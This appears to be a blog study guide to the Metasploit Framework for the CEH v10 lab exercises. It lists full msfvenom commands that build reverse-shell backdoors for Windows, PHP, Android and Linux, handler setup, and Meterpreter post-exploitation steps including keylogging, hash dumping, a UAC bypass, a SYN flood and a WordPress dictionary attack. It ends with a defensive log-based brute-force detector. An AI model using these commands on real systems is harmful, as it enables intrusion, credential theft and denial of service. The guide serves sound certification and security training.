This post explains what the Metasploit Framework is and how it is used in the Certified Ethical Hacker (CEH) exam. It is not intended to be an overall review of the tool.
It is focused on CEH v10.
What is Metasploit Framework?
Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.
The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.
Jack Rhysider’s Darknet Diaries podcast interviewed HD Moore, covering the history of early Metasploit. You can listen to (or read) episode 114 “HD” on Darknet Diaries’ website, Spotify or Apple Podcasts.
Metasploit applications
Metasploit Framework consists of a series of applications. The ones used in CEH are:
- msfdb: manages the Metasploit Framework database.
- msfvenom: tool to create trojans.
- msfconsole: tool to execute exploits. Running msfconsole from a Linux terminal opens the Metasploit Framework console.
msfdb
msfdb init
Initializes the Metasploit database. The PostgreSQL service must already be running (for example, service postgresql start), and you may need to restart it afterwards (service postgresql restart).
msfvenom
msfvenom -l payloads
Lists all the available modules of the given type; here, all the available payloads. The type (payloads, encoders, formats, ...) is required.
parameters
-p: Payload. Value example: windows/meterpreter/reverse_tcp
--platform: Platform. Value example: windows
-a: Architecture. Value example: x86
-e: Encoder. Value example: x86/shikata_ga_nai
-b: Bad characters, i.e. bytes the payload must not contain. Value example: "\x00" (including quotes)
LHOST=: value for the local host (the listener address). Example: LHOST=10.10.10.10
LPORT=: value for the local port (the listener port). Example: LPORT=444
-f: output format. Example: exe or elf
>: shell redirection of the output to a path. Example: > Desktop/Backdoor.exe
-o: output path, equivalent to the redirection above. Example: -o /root/Desktop/Test.exe
Payloads
windows/meterpreter/reverse_tcp
Used to connect back from a remote Windows machine to the listener.
php/meterpreter/reverse_tcp
Generates PHP code. It must be copied into a text file and saved with a .php extension; then it must be run on a web server.
android/meterpreter/reverse_tcp
Generates an apk file for Android.
linux/x86/shell/reverse_tcp
Generates an ELF file for Linux.
Examples
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.11 LPORT=4444 -f raw [writes the PHP code to standard output; redirect it to a file]
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf
msfconsole
msfconsole commands
hosts
Displays the known hosts on the subnetwork (those stored in the database).
services
Displays services on active hosts.
db_status
Checks the database status. If the message reports success (e.g., postgresql connected to msf), everything is correct. If the database is not connected, you may need to initialize it by running msfdb init.
db_import <filename>
Imports a scan results file from local disk into the msf database.
nmap
Calls the nmap command.
db_nmap
I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.
use <module name with path>
Selects an msf module. Value example: scanner/smb/smb_version
show auxiliary
Lists the available auxiliary modules.
show exploits
Lists the available exploits.
show payloads
Lists the available payloads.
background
Sends the current multi/handler session to the background and returns to the msf console.
Auxiliary modules
auxiliary/scanner/smb/smb_version
SMB version scanner module, used to get the OS flavour of the targets.
Seen on CEHv10, mod. 2, ex. 5.
show options
set RHOSTS 10.10.10.8-16
set THREADS 100
run
auxiliary/scanner/snmp/snmp_login
Seen on CEHv10, mod. 4, ex. 9.
set RHOSTS 10.10.10.12
exploit
auxiliary/scanner/snmp/snmp_enum
Seen on CEHv10, mod. 4, ex. 9.
set RHOSTS 10.10.10.12
exploit
Exploit modules
exploit/multi/handler
Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC"
set payload windows/meterpreter/reverse_tcp
Sets the payload.
set LHOST 10.10.10.11
Sets the local host.
set LPORT <port number>
Sets the local port, for example 4444.
exploit -j -z
Runs the exploit. -j means that it runs in the background with one or more sessions. -z is the same, but with just one session. I do not know what it means when both are used together.
Then wait until a connection appears, that is, until a compromised computer runs the payload executable created with msfvenom.
sessions -i 1
Interacts with the session whose id is given, here session 1.
ps
Lists the processes.
getuid
Gets the username on the remote machine.
whoami
Displays current user.
sysinfo
Gets system info.
getsystem -t 1
Escalates privileges. If it does not work, you can try exploit/windows/local/bypassuac_fodhelper.
pwd
Displays current path.
ifconfig
Checks the IP address.
timestomp secret.txt -v
Displays the created, accessed, modified and entry-modified times of the file.
download <filename>
Downloads a file from the remote folder to the local home folder. Example: download bootmgr
search -f "filename.ext"
Searches for a file.
keyscan_start
Captures all keyboard input from the victim system.
keyscan_dump
View captured keyboard input.
idletime
Displays the idle time in seconds.
shutdown
Shuts down the computer.
execute -f cmd.exe -c -H
and then shell
Executes a Windows shell on the remote computer.
exploit/windows/local/bypassuac_fodhelper
It is used once a session has been established with exploit/multi/handler. It allows the getsystem command to succeed.
Seen on CEHv10, mod. 5, ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
It is used to escalate privileges.
show options
Displays all the options of the module.
set SESSION <session number>
Selects the session opened with exploit/multi/handler. Example: set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 10.10.10.11
set TARGET 0
Sets the exploit target id.
exploit
Runs the exploit. If it is successful, it allows privileges to be escalated by running getsystem.
run post/windows/gather/smart_hashdump
Dumps the Windows password hashes.
auxiliary/dos/tcp/synflood
Performs a SYN flood on the target. Seen in module 10, lab/exercise 1.
set RHOST [IP Address of Windows 10]
Sets the target host.
set RPORT 21
Sets the target port.
set SHOST [IP Address of Windows Server 2016]
Sets the spoofed source IP address.
set TIMEOUT 20000
Sets the number of seconds to wait for new data.
auxiliary/scanner/http/wordpress_login_enum
This module is used to perform a dictionary attack against a WordPress site.
Featured in module 14, exercise 2.
show options
Displays the options.
set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
Sets the file containing the passwords for the dictionary attack.
set RHOSTS [IP Address of Windows Server 2012]
Sets the target IP address, e.g., the Windows Server 2012 IP address.
set RPORT 8080
Sets the target machine port, e.g., the Windows Server 2012 port.
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/
Sets the base path to the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.
set USERNAME admin
Sets the username whose password is to be cracked.
run
Runs the module. Look through all the results for the lines marked in green.
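From the defender's side, the dictionary attack above leaves a burst of POST requests to wp-login.php from one client in the web server's access log. The following script, added here as an example and not part of the original post or of Metasploit, parses constructed Apache/nginx combined-format log lines for the /CEH/ site used above and flags clients that fail a threshold of logins within a time window, noting whether a successful login (302 redirect) followed; the sample lines, threshold and window are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def _line(ip, sec, status, method="POST", path="/CEH/wp-login.php"):
    # Builds one constructed log line (sample data, not a real capture).
    return (f'{ip} - - [12/Mar/2024:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" '
            f'{status} 0 "-" "Mozilla/5.0"')

SAMPLE_LOG = "\n".join(
    [_line("10.10.10.11", s, 200) for s in range(1, 6)]   # five failed logins in 5 s
    + [_line("10.10.10.11", 7, 302)]                        # then the dictionary hits
    + [_line("10.10.10.50", 9, 302)]                        # an ordinary successful login
    + [_line("10.10.10.60", 10, 200, "GET", "/CEH/")]       # an ordinary page view
)

def detect_wp_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag clients with `threshold` failed wp-login.php POSTs inside `window`.
    A failed WordPress login re-renders the form with HTTP 200, while a successful
    one answers 302 to wp-admin, so a 302 after the threshold means the attack worked."""
    events = defaultdict(list)   # ip -> [(timestamp, status), ...] for login POSTs
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].endswith("/wp-login.php"):
            events[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, posts in events.items():
        posts.sort()
        recent, total_failed, flagged, compromised = [], 0, False, False
        for ts, status in posts:
            if status == 200:
                total_failed += 1
                recent = [t for t in recent if ts - t <= window] + [ts]  # sliding window
                flagged = flagged or len(recent) >= threshold
            elif status == 302 and flagged:
                compromised = True   # success after the burst: treat as a compromise
        if flagged:
            findings[ip] = {"failed_attempts": total_failed, "compromised": compromised}
    return findings
```

Running detect_wp_bruteforce(SAMPLE_LOG) reports only 10.10.10.11, with compromised set, because the single 302 from 10.10.10.50 never crossed the failure threshold.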
CEHv10 exercises where Metasploit Framework is featured
- Mod. 2 “Information Gathering”
  - Ex. 5 “Information gathering using Metasploit”
- Mod. 4 “Enumeration”
  - Ex. 9 “SNMP Enumeration Using snmp_enum”
- Mod. 6 “System Hacking”
  - Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
  - Ex. 5 “Escalating Privileges by Exploiting Client Side Vulnerabilities”
  - Ex. 6 “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
- Mod. 12
  - Ex. 5 “Bypassing Windows Firewall using Metasploit”
- Mod. 14
  - Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
  - Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
- Mod. 17 “Hacking Mobile Platforms”
  - Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
- Mod. 19
  - Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”